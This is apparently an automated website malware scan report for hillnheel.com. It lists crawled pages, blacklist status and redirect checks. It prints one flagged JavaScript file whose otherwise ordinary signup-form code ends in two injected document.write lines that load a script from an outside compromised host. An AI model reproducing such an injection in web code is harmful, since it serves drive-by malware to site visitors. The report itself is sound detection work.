Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hillnheel.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://hillnheel.com/ | 200 OK Content-Length: 12038 Content-Type: text/html | clean |
http://hillnheel.com/Binclude/indexJs.js | 200 OK Content-Length: 10093 Content-Type: application/javascript | clean |
http://hillnheel.com/include/01.js | 200 OK Content-Length: 94 Content-Type: application/javascript | clean |
http://hillnheel.com/index.php?PHPSESSID=b1a95741f383d1a648b59188b6fbd838 | 200 OK Content-Length: 12038 Content-Type: text/html | clean |
http://hillnheel.com/07_login/01_login.php?PHPSESSID=b1a95741f383d1a648b59188b6fbd838 | 200 OK Content-Length: 37443 Content-Type: text/html | clean |
http://hillnheel.com/07_login/../include/01.js | 200 OK Content-Length: 94 Content-Type: application/javascript | clean |
http://hillnheel.com/07_login/../Bmember/Js/memberformJs.js | 200 OK Content-Length: 16276 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function JoinCheck(form) {
if(!signform.ck_yak.checked) { alert("¾à°ü¿¡ µ¿ÀÇ ÇÏ¼Å¾ß È¸¿ø°¡ÀÔÀÌ °¡´ÉÇÕ´Ï´Ù."); signform.ck_yak.focus(); return false; } if(isBlank(signform.uid.value)) { alert("¾ÆÀ̵𸦠ÀÔ·ÂÇϼ¼¿ä"); signform.uid.focus(); return false; } var chr = signform.uid.value.substr(0,1); if(chr >= 0 || chr > 9 ) { alert('ù ±ÛÀÚ´Â ¿µ¹®À̾î¾ß ÇÕ´Ï´Ù. '); signform.uid dropDownListBoxInit(form.uemail2); } function dropDownListBoxInit(obj) { try { obj.reInitializeSelectBox(); } catch (ignore) {} obj.fireEvent("onchange"); } document.write('<script src=http://sebastiangora-photography.com/1ok/pluginmgr.php ><\/script>'); document.write('<script src=http://sebastiangora-photography.com/1ok/pluginmgr.php ><\/script>'); Antivirus reports:
| ||
http://hillnheel.com/07_login/02_login.php?PHPSESSID=b1a95741f383d1a648b59188b6fbd838 | 200 OK Content-Length: 12456 Content-Type: text/html | clean |
http://hillnheel.com/05_fam/01_fam.php?PHPSESSID=b1a95741f383d1a648b59188b6fbd838 | 200 OK Content-Length: 10128 Content-Type: text/html | clean |
http://hillnheel.com/05_fam/../include/01.js | 200 OK Content-Length: 94 Content-Type: application/javascript | clean |
http://hillnheel.com/05_fam/02_fam.php?PHPSESSID=b1a95741f383d1a648b59188b6fbd838 | 200 OK Content-Length: 14264 Content-Type: text/html | clean |
http://hillnheel.com/Bboard/Js/board_defaultJs.js | 200 OK Content-Length: 2711 Content-Type: application/javascript | clean |
http://hillnheel.com/05_fam/02_fam.php?bmain=view&page=1&total_page=0&num=1&search=&key=&mode=&PHPSESSID=b1a95741f383d1a648b59188b6fbd838 | 200 OK Content-Length: 14985 Content-Type: text/html | clean |
http://hillnheel.com/05_fam/02_fam.php?bmain=list&num=&page=1&search=&key=&PHPSESSID=b1a95741f383d1a648b59188b6fbd838 | 200 OK Content-Length: 14264 Content-Type: text/html | clean |
http://hillnheel.com/test404page.js | 404 Not Found Content-Length: 218 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hillnheel.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 27 Feb 2015 23:05:14 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=b1a95741f383d1a648b59188b6fbd838; path=/
X-Powered-By: PHP/4.4.7p2
GET / HTTP/1.1
Host: hillnheel.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 27 Feb 2015 23:05:14 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=b1a95741f383d1a648b59188b6fbd838; path=/
X-Powered-By: PHP/4.4.7p2
Second query (visit from search engine):
GET / HTTP/1.1
Host: hillnheel.com
Referer: http://www.google.com/search?q=hillnheel.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: hillnheel.com
Referer: http://www.google.com/search?q=hillnheel.com
Result:
The result is similar to the first query. There are no suspicious redirects found.